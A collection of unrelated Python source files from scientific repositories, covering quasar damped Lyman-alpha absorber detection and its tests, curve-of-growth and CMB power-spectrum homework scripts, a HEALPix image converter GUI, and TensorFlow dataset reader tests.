= Z_lls / Z_dla * M / N
"""
this_num_dlas, this_num_quasars = self.prior.less_ind(z_qso)
p_dlas = (
self.dla_samples._Z_lls
/ self.dla_samples._Z_dla
* (this_num_dlas / this_num_quasars) ** np.arange(1, max_dlas + 1)
)
for i in range(max_dlas - 1):
p_dlas[i] = p_dlas[i] - p_dlas[i + 1]
log_priors_dla = np.log(p_dlas)
return log_priors_dla
class SubDLAGPMAT(SubDLAGP):
"""
Load learned model from .mat file
The learned file is the same as DLAGP,
the sample file is different.
"""
def __init__(
self,
params: Parameters,
prior: PriorCatalog,
dla_samples: SubDLASamplesMAT,
min_z_separation: float = 3000.0,
learned_file: str = "learned_qso_model_lyseries_variance_kim_dr9q_minus_concordance.mat",
broadening: bool = True,
):
with h5py.File(learned_file, "r") as learned:
rest_wavelengths = learned["rest_wavelengths"][:, 0]
mu = learned["mu"][:, 0]
M = learned["M"][()].T
log_omega = learned["log_omega"][:, 0]
log_c_0 = learned["log_c_0"][0, 0]
log_tau_0 = learned["log_tau_0"][0, 0]
log_beta = learned["log_beta"][0, 0]
super().__init__(
params,
prior,
dla_samples,
rest_wavelengths,
mu,
M,
log_omega,
log_c_0,
log_tau_0,
log_beta,
prev_tau_0=0.0023,
prev_beta=3.65,
min_z_separation=min_z_separation,
broadening=broadening,
)
```
#### File: gpy_dla_detection/tests/test_map.py
```python
import time
import numpy as np
from .test_model import prepare_dla_model
def test_DLA_MAP():
# test 1
dla_gp = prepare_dla_model(plate=5309, mjd=55929, fiber_id=362, z_qso=3.166)
tic = time.time()
max_dlas = 4
log_likelihoods_dla = dla_gp.log_model_evidences(max_dlas)
toc = time.time()
# very time consuming: ~ 4 mins for a single spectrum without parallelized.
print("spent {} mins; {} seconds".format((toc - tic) // 60, (toc - tic) % 60))
catalog_MAP_log_nhis = np.array(
[
[22.28420156, np.nan, np.nan, np.nan],
[20.63417494, 22.28420156, np.nan, np.nan],
[20.60601572, 22.28420156, 20.63417494, np.nan],
[20.12721363, 22.28420156, 20.63417494, 20.36967609],
]
)
catalog_MAP_z_dlas = np.array(
[
[3.03175723, np.nan, np.nan, np.nan],
[2.52182382, 3.03175723, np.nan, np.nan],
[2.39393537, 3.03175723, 2.52182382, np.nan],
[2.94786938, 3.03175723, 2.52182382, 2.38944805],
]
)
mapind = np.nanargmax(log_likelihoods_dla)
MAP_z_dla, MAP_log_nhi = dla_gp.maximum_a_posteriori()
nanind = np.isnan(catalog_MAP_z_dlas[mapind])
assert np.all(
np.abs(MAP_z_dla[mapind][~nanind] - catalog_MAP_z_dlas[mapind][~nanind]) < 1e-1
)
assert np.all(
np.abs(MAP_log_nhi[mapind][~nanind] - catalog_MAP_log_nhis[mapind][~nanind])
< 1e-1
)
# test 2
dla_gp = prepare_dla_model(plate=3816, mjd=55272, fiber_id=76, z_qso=3.68457627)
tic = time.time()
max_dlas = 4
log_likelihoods_dla = dla_gp.log_model_evidences(max_dlas)
toc = time.time()
# very time consuming: ~ 4 mins for a single spectrum without parallelized.
print("spent {} mins; {} seconds".format((toc - tic) // 60, (toc - tic) % 60))
catalog_MAP_log_nhis = np.array(
[
[21.05371292, np.nan, np.nan, np.nan],
[20.0073665, 20.94707037, np.nan, np.nan],
[20.00838815, 20.94707037, 20.0073665, np.nan],
[20.20539934, 20.94707037, 20.0073665, 20.0134955],
]
)
catalog_MAP_z_dlas = np.array(
[
[3.42520566, np.nan, np.nan, np.nan],
[2.69422714, 3.42710284, np.nan, np.nan],
[3.41452521, 3.42710284, 2.69422714, np.nan],
[3.43813463, 3.42710284, 2.69422714, 3.41262802],
]
)
mapind = np.nanargmax(log_likelihoods_dla)
MAP_z_dla, MAP_log_nhi = dla_gp.maximum_a_posteriori()
nanind = np.isnan(catalog_MAP_z_dlas[mapind])
assert np.all(
np.abs(MAP_z_dla[mapind][~nanind] - catalog_MAP_z_dlas[mapind][~nanind]) < 1e-1
)
assert np.all(
np.abs(MAP_log_nhi[mapind][~nanind] - catalog_MAP_log_nhis[mapind][~nanind])
< 1e-1
)
```
#### File: gpy_dla_detection/tests/test_read_spec.py
```python
import os
from gpy_dla_detection.read_spec import read_spec, retrieve_raw_spec
import numpy as np
def test_read_spec():
if not os.path.exists("spec-7340-56825-0576.fits"):
retrieve_raw_spec(7340, 56825, 576) # an arbitrary spectrum
wavelengths, flux, noise_variance, pixel_mask = read_spec(
"spec-7340-56825-0576.fits"
)
assert min(wavelengths) > 1216
assert len(flux) == len(noise_variance)
assert type(pixel_mask[0]) is np.bool_
```
#### File: gpy_dla_detection/tests/test_voigt.py
```python
import numpy as np
from gpy_dla_detection.voigt import voigt_absorption, instrument_profile, width
def test_instrumental_broadening():
# test 1
z_qso = 3.15
wavelengths = np.linspace(911, 1216, 1000) * (1 + z_qso)
z_dla = 3.1
nhi = 10 ** 20.3
raw_profile = voigt_absorption(
wavelengths, nhi, z_dla, num_lines=3, broadening=False
)
# the convolution written in Roman's code
profile = np.zeros((wavelengths.shape[0] - 2 * width,))
num_points = len(profile)
# instrumental broadening
for i in range(num_points):
for k, j in enumerate(range(i, i + 2 * width + 1)):
profile[i] += raw_profile[j] * instrument_profile[k]
# numpy native convolution
profile_numpy = np.convolve(raw_profile, instrument_profile, "valid")
assert np.all(np.abs(profile - profile_numpy) < 1e-4)
# test 2
z_qso = 5
wavelengths = np.linspace(911, 1216) * (1 + z_qso)
z_dla = 4.5
nhi = 10 ** 21
raw_profile = voigt_absorption(
wavelengths, nhi, z_dla, num_lines=5, broadening=False
)
# the convolution written in Roman's code
profile = np.zeros((wavelengths.shape[0] - 2 * width,))
num_points = len(profile)
# instrumental broadening
for i in range(num_points):
for k, j in enumerate(range(i, i + 2 * width + 1)):
profile[i] += raw_profile[j] * instrument_profile[k]
# numpy native convolution
profile_numpy = np.convolve(raw_profile, instrument_profile, "valid")
assert np.all(np.abs(profile - profile_numpy) < 1e-4)
```
#### File: gpy_dla_detection/tests/test_zestimation.py
```python
import os
import re
import time
import numpy as np
from .test_selection import filenames, z_qsos
from gpy_dla_detection.read_spec import read_spec, retrieve_raw_spec
from gpy_dla_detection.zqso_set_parameters import ZParameters
from gpy_dla_detection.zqso_samples import ZSamples
from gpy_dla_detection.zqso_gp import ZGPMAT
def test_zestimation(nspec: int):
filename = filenames[nspec]
if not os.path.exists(filename):
plate, mjd, fiber_id = re.findall(
r"spec-([0-9]+)-([0-9]+)-([0-9]+).fits", filename,
)[0]
retrieve_raw_spec(int(plate), int(mjd), int(fiber_id))
params = ZParameters()
z_qso_samples = ZSamples(params)
wavelengths, flux, noise_variance, pixel_mask = read_spec(filename)
z_qso_gp = ZGPMAT(
params,
z_qso_samples,
learned_file="data/dr12q/processed/learned_zqso_only_model_outdata_full_dr9q_minus_concordance_norm_1176-1256.mat",
)
tic = time.time()
z_qso_gp.inference_z_qso(wavelengths, flux, noise_variance, pixel_mask)
print("Z True : {:.3g}".format(z_qsos[nspec]))
toc = time.time()
print("spent {} mins; {} seconds".format((toc - tic) // 60, (toc - tic) % 60))
return z_qso_gp.z_map, z_qsos[nspec]
def test_batch(num_quasars: int = 100):
all_z_diffs = np.zeros((num_quasars,))
for nspec in range(num_quasars):
z_map, z_true = test_zestimation(nspec)
z_diff = z_map - z_true
print("[Info] z_diff = z_map - z_true = {:.8g}".format(z_diff))
all_z_diffs[nspec] = z_diff
print("[Info] abs(z_diff) < 0.5 = {:.4g}".format(accuracy(all_z_diffs, 0.5)))
print("[Info] abs(z_diff) < 0.05 = {:.4g}".format(accuracy(all_z_diffs, 0.05)))
# we got ~99% accuracy in https://arxiv.org/abs/2006.07343
# so at least we need to ensure ~98% here
assert accuracy(all_z_diffs, 0.5) > 0.98
def accuracy(z_diff: np.ndarray, z_thresh: float):
num_quasars = z_diff.shape[0]
corrects = (np.abs(z_diff) < z_thresh).sum()
return corrects / num_quasars
``` |
{
"source": "jibanCat/homework_helper",
"score": 4
} |
#### File: homework_helper/homework_helper/tex_reader.py
```python
import re
def load_tex(filepath):
'''
Loading a .tex file from disk as a string.
'''
with open(filepath, 'r') as file:
tex = file.read()
return tex.encode("unicode_escape").decode(
).replace("\\\\", "\\").replace(r"\n", r" ")
def equation_pattern():
'''
Generate a regex pattern for LaTex equations.
'''
# TODO: parse labels in the equation.
pattern = re.compile(r"\\begin{equation}(.+?)\\end{equation}")
return pattern
def parse_equations(tex):
'''
From tex to a list of equations.
'''
pass
``` |
{
"source": "jibanCat/ISM_homework",
"score": 2
} |
#### File: ISM_homework/hw4/absorbers.py
```python
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import cm
# get gradient from cmap colors
cmap = cm.get_cmap("viridis")
# redshift
z = 2
save_figure = lambda filename : plt.savefig(filename, dpi=300, format="pdf")
class Ion:
# cgs units
c = 3 * 10**10
def __init__(self, lrest, f, gamma, Wlrest):
self.lrest = lrest
self.f = f
self.gamma = gamma
self.Wlrest = Wlrest
self.W = self.Wl2W(Wlrest, lrest)
@staticmethod
def Wl2W(Wl, l):
return Wl / l
@staticmethod
def tau_0(f, l, b, N):
'''
in cgs
'''
return 1.497e-2 * f * l / b * N
def approx_W_small(self, b, tau_0):
'''
Approximated W if tau_0 < 1.25393
'''
W = np.sqrt(np.pi) * b / self.c * tau_0 / (1 + tau_0 / (2 * np.sqrt(2)))
return W
def approx_W_large(self, b, tau_0):
'''
Approximated W if tau_0 > 1.25393
'''
term_ln_tau = (2 * b / self.c)**2 * np.log(tau_0 / np.log(2))
term_gamma = b / self.c * self.gamma * self.lrest / self.c * (tau_0 - 1.25393) / np.sqrt(2)
return np.sqrt( term_ln_tau + term_gamma )
def calc_W(self, N, b):
'''
calc W based on given N and b.
N (array)
b (float)
'''
tau_0 = self.tau_0(
self.f, self.lrest, b, N
)
ind = tau_0 >= 1.25393
W = np.empty(ind.shape)
W_small = self.approx_W_small(b, tau_0)
W_large = self.approx_W_large(b, tau_0)
W[ ind] = W_large[ind]
W[~ind] = W_small[~ind]
return W
def do_loglog_plot(ion, N, all_b):
'''
Plotting for C.O.G in 1(a)
'''
# plot for different bs
for i,b in enumerate(all_b):
W = ion.calc_W(N, b)
plt.loglog(N, W, label="b = {} km/s".format(b / 10**5), color=cmap(i / len(all_b)))
plt.xlabel(r"$N_{\ell}$")
plt.ylabel(r"$W$")
plt.legend()
def do_loglog_plot_Wlambda(ion, N, all_b):
'''
Plotting for C.O.G in 1(a)
'''
# plot for different bs
for i,b in enumerate(all_b):
W = ion.calc_W(N, b)
Wl = W * ion.lrest * 10**8 # A
plt.loglog(N, Wl, label="b = {} km/s".format(b / 10**5), color=cmap(i / len(all_b)))
plt.xlabel(r"$N_{\ell}$")
plt.ylabel(r"$W^{\mathrm{rest}}_\lambda$ $\AA$")
plt.legend()
# provided by the question
all_b = np.array([1, 2, 3, 5, 10]) * 10**5 # cm/s
log_NFe = np.linspace(12, 16, 100)
log_NC = np.linspace(13, 17, 100)
# unit convert
NFe = 10**( log_NFe ) # cm^-2
NC = 10**( log_NC ) # cm^-2
ion_fe_1 = Ion(2382.7642 * 10**-8, 0.32, 3.13e8, 0.051)
ion_fe_2 = Ion(2249.8768 * 10**-8, 0.00182, 3.31e8, 0.0047)
ion_c = Ion(1334.5323 * 10**-8, 0.12780, 2.880e8, 0.060)
# 1(a) do plots
do_loglog_plot(ion_fe_1, NFe, all_b); save_figure("images/W_N_Fe_II_1.pdf"); plt.clf()
do_loglog_plot(ion_fe_2, NFe, all_b); save_figure("images/W_N_Fe_II_2.pdf"); plt.clf()
do_loglog_plot(ion_c, NC, all_b); save_figure( "images/W_N_C_II.pdf"); plt.clf()
do_loglog_plot_Wlambda(ion_fe_1, NFe, all_b)
plt.hlines(ion_fe_1.Wlrest, min(NFe), max(NFe))
save_figure("images/Wl_N_Fe_II_1.pdf"); plt.clf()
do_loglog_plot_Wlambda(ion_fe_2, NFe, all_b)
plt.hlines(ion_fe_2.Wlrest, min(NFe), max(NFe))
save_figure("images/Wl_N_Fe_II_2.pdf"); plt.clf()
do_loglog_plot_Wlambda(ion_c, NC, all_b)
plt.hlines(ion_c.Wlrest, min(NC), max(NC))
save_figure("images/Wl_N_C_II.pdf"); plt.clf()
# 1(b)
dv_Fe_1 = 2 * np.sqrt(np.log(2)) * 1.5
print("(dv)FeII_1 = {};".format(dv_Fe_1))
print("(dv)FeII_obs_1 = {};".format(dv_Fe_1 * (1 + z)))
# 1(d) thermal broadening
calc_T = lambda M_mH, dv : 1/2.15**2 * M_mH * dv**2 * 100
T_Fe_1 = calc_T(56, 2.5)
print("At least T for Fe II {}.".format(
T_Fe_1
))
# 1(e)
Mfe = 56
MC = 12
b_fe = 2.5
b_C = np.sqrt(Mfe / MC) * b_fe
print("b for CII by thermal: {}".format(b_C))
do_loglog_plot_Wlambda(ion_fe_1, NFe, all_b)
plt.hlines(ion_fe_1.Wlrest, min(NFe), max(NFe))
save_figure("images/Wl_N_Fe_II_1_more_b.pdf"); plt.clf()
``` |
{
"source": "jibanCat/phys214_obsastro",
"score": 3
} |
#### File: phys214_obsastro/cosmos_hw/camb_change_neutrino.py
```python
import numpy as np
import camb
from matplotlib import pyplot as plt
from matplotlib.cm import get_cmap
viridis = get_cmap("viridis")
def change_neutrino(mnu):
'''
mnu : neutrino mass (eV)
other params set to Planck 2018 results
'''
# setup six init params from the paper
params = camb.CAMBparams() # the obj stores params
params.set_cosmology(
H0=67.4, ombh2=0.022383,
omch2=0.122011, omk=0, tau=0.0543,
mnu=mnu, neutrino_hierarchy='degenerate')
params.InitPower.set_params(
As=np.exp(3.0448) * 1e-10, ns=0.96605)
params.set_for_lmax(2500, lens_potential_accuracy=0)
# calculate the results of params
results = camb.get_results(
params)
# get power spec
power_spec = results.get_cmb_power_spectra(
params, CMB_unit="muK", lmax=2500)
return power_spec
# a) Keep ΩMh2 , H0 and Ωbh2 constant and vary Ωk
fig, ax = plt.subplots(1, 1, figsize = (10, 6))
for i in range(11):
mnu = 0 + i * 0.1
power_spec = change_neutrino(mnu)
total_cls = power_spec['total']
unlensed_total_cls = power_spec['unlensed_scalar']
ls = np.arange(total_cls.shape[0])
ax.plot(ls, unlensed_total_cls[:, 0] ,
color=viridis( i / 11), label=r'$m_\nu = {:.1g}$'.format(mnu))
ax.set_title(r'Change $m_\nu$')
ax.set_xlim(0, 2500)
ax.set_xlabel(r'$\ell$')
ax.set_ylabel(r'$\mathcal{D}^{TT}_\ell$ [$\mu K^2$]')
ax.legend()
plt.savefig("images/change_neutrino.png", format='png', dpi=200)
plt.show()
```
#### File: hw1/signal/calculator.py
```python
import math as m
import sympy as sp
t = sp.symbols("t")
# S/N ratio equation
sn = lambda R_s, R_sky, RN, DN, npix, t : R_s * t / ( R_s * t + R_sky * t * npix + RN**2 * npix + DN * t * npix )**(1/2)
def solve_SN_20(R_s, R_sky, RN, DN, npix, t):
'''
Parameters
----
R_s : float, e/s from source
R_sky : float, e/s/pix from sky
RN : float, sqrt(e/s/pix) readout noise
DN : float, e/s dark current noise
npix : int, number of pixels
t : sympy.symbol, time to solve
Return:
t_20 : the time for S/N reach 20
'''
expr = sn(R_s, R_sky, RN**(1/2), DN, npix, t)
return sp.solve(sp.Eq(expr, 20), t)[0]
```
#### File: phys214_obsastro/hw2/generate_observation_run.py
```python
from starlist.calc_time import LT2LMST
from datetime import date, datetime, timedelta
# set parameters
init_year = 2020
init_month = 3
init_day = 22
init_hh = 18
init_mm = 0
init_ss = 0
initial_time = datetime(init_year, init_month, init_day, init_hh, init_mm, init_ss)
# increment of time
delta_mm = 10 # minutes
# end time
end_year = 2020
end_month = 3
end_day = 23
end_hh = 6
end_mm = 10
end_ss = 0
end_time = datetime(end_year, end_month, end_day, end_hh, end_mm, end_ss)
def generate_time_interval(initial_time, end_time, delta_mm):
'''
generate a list of time intervals with delta minutes
'''
for i in range( int((end_time - initial_time).seconds // 60 // delta_mm) ):
yield initial_time + timedelta(minutes=i * delta_mm)
# generate a list for schedule
local_time_list = list(generate_time_interval(initial_time, end_time, delta_mm))
local_mean_sidereal_time_list = [
LT2LMST(ls.year, ls.month, ls.day, ls.hour, ls.minute, ls.second) for ls in local_time_list
]
def generate_schedule(local_time_list, local_mean_sidereal_time_list):
'''
print the schedule, handle the format
'''
column_names = ["LT", "LMST", "Target", "Exposure Time", "Comments"]
markdown_sep = "---".join( ["|" for i in range(len(column_names) + 1)] )
schedule_list = [
"|{}|".format( "|".join( column_names ) ),
markdown_sep
]
for ls, lmst in zip(local_time_list, local_mean_sidereal_time_list):
ls_str = "{:02d}:{:02d}".format( int(ls.hour), int(ls.minute) )
lmst_str = "{:02d}:{:02d}:{:05.2f}".format( int(lmst[0]), int(lmst[1]), lmst[2] )
row_str = "| {:<10} | {:<10} | | | |".format(ls_str, lmst_str)
schedule_list.append(row_str)
schedule_str = "\n".join( schedule_list )
print(schedule_str)
return schedule_str
``` |
{
"source": "jibanCat/Square2Healpix",
"score": 3
} |
#### File: jibanCat/Square2Healpix/Tkinter_healpy.py
```python
import sys
if sys.version_info[0] > 2:
from tkinter import *
import tkinter.filedialog as tkFileDialog
else:
from Tkinter import *
import tkFileDialog
from PIL import Image, ImageTk
import numpy as np
import matplotlib.pyplot as plt
from image2healpix import *
import matplotlib
#matplotlib.use("TkAgg")
def select_image():
global panelA, panelB, entry1
path = tkFileDialog.askopenfilename()
try:
deg = float(entry1.get())
if not (0 < deg <= 180):
print('Please enter a valid number between 0 - 180 deg.')
except ValueError:
print('Please enter a valid number between 0 - 180 deg.')
if len(path) > 0:
image_array, healpix, xsize = main(path, deg)
# panel A
image = image_array.reshape((xsize, xsize))
image = (image - image.min()) / (image.max() - image.min()) * 255
image = Image.fromarray(image.astype(np.uint8)).resize((400, 400))
image = ImageTk.PhotoImage(image)
# panel B
project = hp.mollview(healpix, xsize=400, return_projected_map=True)
#plt.close()
project[project == -np.inf] = project.max()
project = (project - project.min()) / (project.max() - project.min()) * 255
project = Image.fromarray(project.astype(np.uint8))
project = ImageTk.PhotoImage(project)
print('[Info] Creating panels')
# inital panel
if panelA is None or panelB is None:
panelA = Label(image=image)
panelA.image = image
panelA.grid(row=2, column=0, padx=10, pady=10)
panelB = Label(image=project,)
panelB.healpix = healpix
panelB.nside = hp.npix2nside(len(healpix))
panelB.image = project
panelB.grid(row=2, column=1, padx=10, pady=10)
# or update the panels
else:
panelA.configure(image=image)
panelB.configure(image=project, )
panelA.image = image
panelB.image = project
panelB.healpix = healpix
panelB.nside = hp.npix2nside(len(healpix))
def save_file():
global panelB
output_file = tkFileDialog.asksaveasfilename()
if output_file is None:
return
save('{}.fits'.format(output_file),
panelB.healpix, write_alm=False)
def save_alm_file():
global panelB
output_file = tkFileDialog.asksaveasfilename()
if output_file is None:
return
print('[Info] Saving the alms file ... take a little while to convert image file to alms')
save(output_file + '.fits',
panelB.healpix, panelB.nside, write_alm=True)
root = Tk()
root.title = 'Square image to HEALPix'
panelA = None
panelB = None
Label1 = Label(root, text="deg of the square (0-180): ").grid(row=0, column=0, sticky=W)
Label2 = Label(root, text="sqaure image array (1-D): ").grid(row=0, column=1, sticky=W)
entry1 = Entry(root, )
entry1.grid(row=1, sticky=W)
# create button
save_button = Button(root, text="save the HEALPix map fits", command=save_file)
#save_button.pack(side="bottom", fill="both", expand=True, padx="2", pady="2")
save_button.grid(row=3, sticky=W)
save_alm_button = Button(root, text="save the HEALPix alm (l,m,re,im)", command=save_alm_file)
#save_alm_button.pack(side="bottom", fill="both", expand=True, padx="2", pady="2")
save_alm_button.grid(row=4, sticky=W)
button = Button(root, text="select", command=select_image)
#button.pack(side="bottom", fill="both", expand=True, padx="10", pady="10")
button.grid(row=1, column=1, sticky=W)
root.mainloop()
``` |
{
"source": "Jibanprakash/tensorflow",
"score": 2
} |
#### File: python/kernel_tests/reader_dataset_ops_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import zlib
import numpy as np
from tensorflow.contrib.data.python.kernel_tests import dataset_serialization_test_base
from tensorflow.contrib.data.python.ops import readers
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import python_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class TextLineDatasetTestBase(test.TestCase):
def _lineText(self, f, l):
return compat.as_bytes("%d: %d" % (f, l))
def _createFiles(self,
num_files,
num_lines,
crlf=False,
compression_type=None):
filenames = []
for i in range(num_files):
fn = os.path.join(self.get_temp_dir(), "text_line.%d.txt" % i)
filenames.append(fn)
contents = []
for j in range(num_lines):
contents.append(self._lineText(i, j))
# Always include a newline after the record unless it is
# at the end of the file, in which case we include it
if j + 1 != num_lines or i == 0:
contents.append(b"\r\n" if crlf else b"\n")
contents = b"".join(contents)
if not compression_type:
with open(fn, "wb") as f:
f.write(contents)
elif compression_type == "GZIP":
with gzip.GzipFile(fn, "wb") as f:
f.write(contents)
elif compression_type == "ZLIB":
contents = zlib.compress(contents)
with open(fn, "wb") as f:
f.write(contents)
else:
raise ValueError("Unsupported compression_type", compression_type)
return filenames
class TextLineDatasetSerializationTest(
TextLineDatasetTestBase,
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_iterator_graph(self, test_filenames, compression_type=None):
return core_readers.TextLineDataset(
test_filenames, compression_type=compression_type, buffer_size=10)
def testTextLineCore(self):
compression_types = [None, "GZIP", "ZLIB"]
num_files = 5
lines_per_file = 5
num_outputs = num_files * lines_per_file
for compression_type in compression_types:
test_filenames = self._createFiles(
num_files,
lines_per_file,
crlf=True,
compression_type=compression_type)
# pylint: disable=cell-var-from-loop
self.run_core_tests(
lambda: self._build_iterator_graph(test_filenames, compression_type),
lambda: self._build_iterator_graph(test_filenames), num_outputs)
# pylint: enable=cell-var-from-loop
class FixedLengthRecordReaderTestBase(test.TestCase):
def setUp(self):
super(FixedLengthRecordReaderTestBase, self).setUp()
self._num_files = 2
self._num_records = 7
self._header_bytes = 5
self._record_bytes = 3
self._footer_bytes = 2
def _record(self, f, r):
return compat.as_bytes(str(f * 2 + r) * self._record_bytes)
def _createFiles(self):
filenames = []
for i in range(self._num_files):
fn = os.path.join(self.get_temp_dir(), "fixed_length_record.%d.txt" % i)
filenames.append(fn)
with open(fn, "wb") as f:
f.write(b"H" * self._header_bytes)
for j in range(self._num_records):
f.write(self._record(i, j))
f.write(b"F" * self._footer_bytes)
return filenames
class FixedLengthRecordDatasetSerializationTest(
FixedLengthRecordReaderTestBase,
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_iterator_graph(self, num_epochs, compression_type=None):
filenames = self._createFiles()
return core_readers.FixedLengthRecordDataset(
filenames, self._record_bytes, self._header_bytes,
self._footer_bytes).repeat(num_epochs)
def testFixedLengthRecordCore(self):
num_epochs = 5
num_outputs = num_epochs * self._num_files * self._num_records
self.run_core_tests(lambda: self._build_iterator_graph(num_epochs),
lambda: self._build_iterator_graph(num_epochs * 2),
num_outputs)
class TFRecordDatasetTestBase(test.TestCase):
def setUp(self):
super(TFRecordDatasetTestBase, self).setUp()
self._num_files = 2
self._num_records = 7
self.test_filenames = self._createFiles()
self.filenames = array_ops.placeholder(dtypes.string, shape=[None])
self.num_epochs = array_ops.placeholder_with_default(
constant_op.constant(1, dtypes.int64), shape=[])
self.compression_type = array_ops.placeholder_with_default("", shape=[])
self.batch_size = array_ops.placeholder(dtypes.int64, shape=[])
repeat_dataset = core_readers.TFRecordDataset(
self.filenames, self.compression_type).repeat(self.num_epochs)
batch_dataset = repeat_dataset.batch(self.batch_size)
iterator = iterator_ops.Iterator.from_structure(batch_dataset.output_types)
self.init_op = iterator.make_initializer(repeat_dataset)
self.init_batch_op = iterator.make_initializer(batch_dataset)
self.get_next = iterator.get_next()
def _record(self, f, r):
return compat.as_bytes("Record %d of file %d" % (r, f))
def _createFiles(self):
filenames = []
for i in range(self._num_files):
fn = os.path.join(self.get_temp_dir(), "tf_record.%d.txt" % i)
filenames.append(fn)
writer = python_io.TFRecordWriter(fn)
for j in range(self._num_records):
writer.write(self._record(i, j))
writer.close()
return filenames
class TFRecordDatasetSerializationTest(
TFRecordDatasetTestBase,
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_iterator_graph(self,
num_epochs,
batch_size=1,
compression_type=None,
buffer_size=None):
filenames = self._createFiles()
if compression_type is "ZLIB":
zlib_files = []
for i, fn in enumerate(filenames):
with open(fn, "rb") as f:
cdata = zlib.compress(f.read())
zfn = os.path.join(self.get_temp_dir(), "tfrecord_%s.z" % i)
with open(zfn, "wb") as f:
f.write(cdata)
zlib_files.append(zfn)
filenames = zlib_files
elif compression_type is "GZIP":
gzip_files = []
for i, fn in enumerate(self.test_filenames):
with open(fn, "rb") as f:
gzfn = os.path.join(self.get_temp_dir(), "tfrecord_%s.gz" % i)
with gzip.GzipFile(gzfn, "wb") as gzf:
gzf.write(f.read())
gzip_files.append(gzfn)
filenames = gzip_files
return core_readers.TFRecordDataset(
filenames, compression_type,
buffer_size=buffer_size).repeat(num_epochs).batch(batch_size)
def testTFRecordWithoutBufferCore(self):
num_epochs = 5
batch_size = num_epochs
num_outputs = num_epochs * self._num_files * self._num_records // batch_size
# pylint: disable=g-long-lambda
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, batch_size,
buffer_size=0),
lambda: self._build_iterator_graph(num_epochs * 2, batch_size),
num_outputs)
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, buffer_size=0), None,
num_outputs * batch_size)
# pylint: enable=g-long-lambda
def testTFRecordWithBufferCore(self):
num_epochs = 5
num_outputs = num_epochs * self._num_files * self._num_records
self.run_core_tests(lambda: self._build_iterator_graph(num_epochs),
lambda: self._build_iterator_graph(num_epochs * 2),
num_outputs)
def testTFRecordWithCompressionCore(self):
num_epochs = 5
num_outputs = num_epochs * self._num_files * self._num_records
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, compression_type="ZLIB"),
lambda: self._build_iterator_graph(num_epochs * 2), num_outputs)
self.run_core_tests(
lambda: self._build_iterator_graph(num_epochs, compression_type="GZIP"),
lambda: self._build_iterator_graph(num_epochs * 2), num_outputs)
def _interleave(iterators, cycle_length):
pending_iterators = iterators
open_iterators = []
num_open = 0
for i in range(cycle_length):
if pending_iterators:
open_iterators.append(pending_iterators.pop(0))
num_open += 1
while num_open:
for i in range(min(cycle_length, len(open_iterators))):
if open_iterators[i] is None:
continue
try:
yield next(open_iterators[i])
except StopIteration:
if pending_iterators:
open_iterators[i] = pending_iterators.pop(0)
else:
open_iterators[i] = None
num_open -= 1
class ReadBatchFeaturesTest(test.TestCase):
def setUp(self):
super(ReadBatchFeaturesTest, self).setUp()
self._num_files = 2
self._num_records = 7
self.test_filenames = self._createFiles()
def _read_batch_features(self,
filenames,
num_epochs,
batch_size,
reader_num_threads=1,
parser_num_threads=1,
shuffle=False,
shuffle_seed=None,
drop_final_batch=False):
self.filenames = filenames
self.num_epochs = num_epochs
self.batch_size = batch_size
return readers.make_batched_features_dataset(
file_pattern=self.filenames,
batch_size=self.batch_size,
features={
"file": parsing_ops.FixedLenFeature([], dtypes.int64),
"record": parsing_ops.FixedLenFeature([], dtypes.int64),
"keywords": parsing_ops.VarLenFeature(dtypes.string)
},
reader=core_readers.TFRecordDataset,
num_epochs=self.num_epochs,
shuffle=shuffle,
shuffle_seed=shuffle_seed,
reader_num_threads=reader_num_threads,
parser_num_threads=parser_num_threads,
drop_final_batch=drop_final_batch).make_one_shot_iterator(
).get_next()
def _record(self, f, r):
example = example_pb2.Example(
features=feature_pb2.Features(
feature={
"file":
feature_pb2.Feature(
int64_list=feature_pb2.Int64List(value=[f])),
"record":
feature_pb2.Feature(
int64_list=feature_pb2.Int64List(value=[r])),
"keywords":
feature_pb2.Feature(
bytes_list=feature_pb2.BytesList(
value=self._get_keywords(f, r)))
}))
return example.SerializeToString()
def _get_keywords(self, f, r):
num_keywords = 1 + (f + r) % 2
keywords = []
for index in range(num_keywords):
keywords.append(compat.as_bytes("keyword%d" % index))
return keywords
def _createFiles(self):
filenames = []
for i in range(self._num_files):
fn = os.path.join(self.get_temp_dir(), "tf_record.%d.txt" % i)
filenames.append(fn)
writer = python_io.TFRecordWriter(fn)
for j in range(self._num_records):
writer.write(self._record(i, j))
writer.close()
return filenames
def _run_actual_batch(self, outputs, sess):
file_op = outputs["file"]
keywords_indices_op = outputs["keywords"].indices
keywords_values_op = outputs["keywords"].values
keywords_dense_shape_op = outputs["keywords"].dense_shape
record_op = outputs["record"]
return sess.run([
file_op, keywords_indices_op, keywords_values_op,
keywords_dense_shape_op, record_op
])
def _next_actual_batch(self, sess):
return self._run_actual_batch(self.outputs, sess)
def _next_expected_batch(self,
file_indices,
batch_size,
num_epochs,
cycle_length=1):
def _next_record(file_indices):
for j in file_indices:
for i in range(self._num_records):
yield j, i
def _next_record_interleaved(file_indices, cycle_length):
return _interleave([_next_record([i]) for i in file_indices],
cycle_length)
file_batch = []
keywords_batch_indices = []
keywords_batch_values = []
keywords_batch_max_len = 0
record_batch = []
batch_index = 0
for _ in range(num_epochs):
if cycle_length == 1:
next_records = _next_record(file_indices)
else:
next_records = _next_record_interleaved(file_indices, cycle_length)
for record in next_records:
f = record[0]
r = record[1]
file_batch.append(f)
record_batch.append(r)
keywords = self._get_keywords(f, r)
keywords_batch_values.extend(keywords)
keywords_batch_indices.extend(
[[batch_index, i] for i in range(len(keywords))])
batch_index += 1
keywords_batch_max_len = max(keywords_batch_max_len, len(keywords))
if len(file_batch) == batch_size:
yield [
